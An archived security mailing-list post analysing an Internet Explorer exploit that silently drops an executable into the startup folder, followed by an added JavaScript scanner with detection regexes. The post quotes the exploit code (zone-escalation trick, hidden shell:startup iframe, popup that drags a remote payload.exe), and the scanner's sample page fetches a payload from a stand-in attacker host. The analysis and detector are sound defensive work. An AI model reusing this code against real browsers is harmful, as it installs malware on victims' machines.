Open Source and information security mailing list archives
 
Message-ID: <413DC14A.1030201@scanit.be>
From: alla at scanit.be (Alla Bezroutchko)
Subject: Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!]

Martin Stricker wrote:
> I just got attached e-mail. On the linked website I found this exploit
> code (sorry for the line breaks):

As far as I can figure out it is a combination of two unpatched 
vulnerabilities. First it uses method assignment vulnerability 
(discovered by Paul (at) greyhats cjb net - see 
http://www.securityfocus.com/archive/1/368671) to get into Local 
Computer zone:

function govuln(){
     var w=window.open("javascript:wait for parent to change domain and 
then call location.assign with a javascript url");
     w.location.assign=location.assign;
     location.href="http://localhost";
}

Once in local computer zone it does what I believe is a variation of 
drag and drop file installation vulnerability discovered by http-equiv. 
The interesting twist is that instead of tricking the user into 
dragging and dropping something (as mikx demonstrated at 
http://www.mikx.de/scrollbar/) they get the user to click on an image 
and then pull the window with the image from under the mouse to emulate 
drag and drop.

First they create an iframe with shell:startup folder.

   <iframe src=shell:startup HEIGHT=5000; WIDTH=5000 
style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-index:-90;>
   </iframe>

Then they open a popup window that covers the whole screen and shows an 
image 1.gif using styles. The src of the image points to the payload 
executable. The image is an animated gif that first shows a counter and 
then says "Click to enter".

   <body onload=showpop()>
      <script>
          function showpop(){
               pop=window.createPopup();
               pop.document.body.style.margin=0;
               pop.document.body.innerHTML=txt.value;
               pop.show(100,100,screen.width+300,screen.height+300);
          }
      </script>
      <span style=position: absolute; left: 1; top: 1 id=absspan>
      </span>
      <textarea id=txt rows=1 cols=20 style=display:none>
          <html><body><table width=100% height=100%><tr ALIGN=LEFT 
VALIGN=TOP><br><center><img src=http://removed/payload.exe id=anch 
onmousedown=parent.pop.show(1,1,1,1); 
style=width=4000px;height=4000px;background-image:url('http://removed/1.gif');></a></td></tr></table>
      </textarea>
    </body>

When the user clicks on the image, the underlying popup window is moved 
by calling parent.pop.show(1,1,1,1). So the image is effectively 
dragged into shell:startup, and the executable is installed in the 
startup folder. This technique (pull the window from under the mouse to 
emulate drag and drop) AFAIK was first shown by Liu Die Yu in 
HijackClick 
(http://umbrella.name/originalvuln/msie/HijackClick/HijackClick-Content.HTM)

Another trick that they use is to download the payload executable first, 
using XmlHTTP object. I think this is to get it cached, and make the 
whole exploit more reliable.

Also interesting that they don't use
"a {behavior:url(#default#AnchorClick);}"
in this exploit which seems to be an essential part of http-equiv's and 
mikx's exploits.

Alla.
-- 
Scanit Belgium
Browser Security Test - http://bcheck.scanit.be/bcheck/
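An added example, not part of Alla's message or of the exploit page it analyses: a small static indicator scanner that walks raw HTML/script text and reports which building blocks of the technique described above are present (the location.assign overwrite, the navigation to http://localhost, the hidden shell: iframe, window.createPopup, an <img> whose src is an .exe, an onmousedown handler that moves a window with .show(), and an XMLHTTP prefetch of the payload). The two sample pages, the host name attacker.invalid and the function name scanForHijackClick are constructed for this example; the regexes are heuristics written from the snippets quoted in the post, not signatures from any vendor.

```javascript
// Added example (not from the original post). Indicator scan for the
// "pull the window from under the mouse" drag-and-drop emulation
// described by Alla. Runs offline over a string of page source.

const INDICATORS = [
  // Step 1: overwrite location.assign on a child window (method assignment bug)
  { id: "method-assign",
    re: /\blocation\.assign\s*=\s*location\.assign\b/i,
    why: "location.assign of a popup overwritten with the opener's" },
  // Then navigate the opener to localhost to land in the Local Computer zone
  { id: "localhost-nav",
    re: /location\.href\s*=\s*["']https?:\/\/localhost\b/i,
    why: "navigation to http://localhost (Local Computer zone)" },
  // Step 2: an iframe whose src is a shell: URI (the shell:startup drop target)
  { id: "shell-iframe",
    re: /<iframe[^>]*\bsrc\s*=\s*["']?shell:/i,
    why: "iframe pointing at the shell: namespace" },
  // A full-screen overlay built with the IE-only window.createPopup()
  { id: "createpopup",
    re: /\bwindow\.createPopup\s*\(/i,
    why: "window.createPopup() used to build an overlay window" },
  // The 'image' that gets dropped is really an executable
  { id: "img-exe",
    re: /<img[^>]*\bsrc\s*=\s*["']?[^"'\s>]+\.exe\b/i,
    why: "<img> whose src is an .exe" },
  // The mousedown handler that yanks the popup out from under the pointer
  { id: "mousedown-move",
    re: /\bonmousedown\s*=\s*["']?[^"'>]*\.show\s*\(/i,
    why: "onmousedown handler calling .show() to move a window under the click" },
  // Payload pre-fetched with XMLHTTP so it is already in the browser cache
  { id: "xmlhttp-prefetch",
    re: /\b(?:Microsoft\.XMLHTTP|XMLHttpRequest)\b[\s\S]{0,300}?\.exe\b/i,
    why: "XMLHTTP/XMLHttpRequest used to fetch an .exe" },
];

// Returns the ids of matching indicators and whether the three pieces the
// drop actually needs (target iframe, executable image, window move) are all there.
function scanForHijackClick(source) {
  const hits = INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ind.id);
  const core = ["shell-iframe", "img-exe", "mousedown-move"];
  const strong = core.every((id) => hits.includes(id));
  return { hits, strong };
}

// Constructed sample that mirrors the structure quoted in the post
// (hypothetical host attacker.invalid; not the real page).
const SUSPECT_PAGE = `
<script>
function govuln(){
  var w=window.open("javascript:...");
  w.location.assign=location.assign;
  location.href="http://localhost";
}
var x=new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET","http://attacker.invalid/payload.exe",false); x.send();
</script>
<iframe src=shell:startup HEIGHT=5000 WIDTH=5000 style=position:absolute;left:-2000;></iframe>
<body onload=showpop()>
<script>function showpop(){pop=window.createPopup();pop.show(100,100,screen.width+300,screen.height+300);}</script>
<textarea id=txt style=display:none>
<img src=http://attacker.invalid/payload.exe id=anch onmousedown=parent.pop.show(1,1,1,1);>
</textarea>
</body>`;

// Constructed benign page: iframe, image and a mousedown handler, none of them suspicious.
const BENIGN_PAGE = `
<iframe src="https://example.invalid/widget.html"></iframe>
<img src="https://example.invalid/banner.gif" onmousedown="track('click')">
<script>location.href="https://example.invalid/home";</script>`;

function describe(result) {
  return INDICATORS.filter((ind) => result.hits.includes(ind.id)).map((ind) => ind.why);
}

console.log(scanForHijackClick(SUSPECT_PAGE), describe(scanForHijackClick(SUSPECT_PAGE)));
console.log(scanForHijackClick(BENIGN_PAGE));
```

The "strong" flag deliberately keys on the three components that make the drop work rather than on the zone-escalation part, because the same window-move trick can be paired with a different route into the Local Computer zone; the other indicators are reported so an analyst can see which variant is in front of them.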

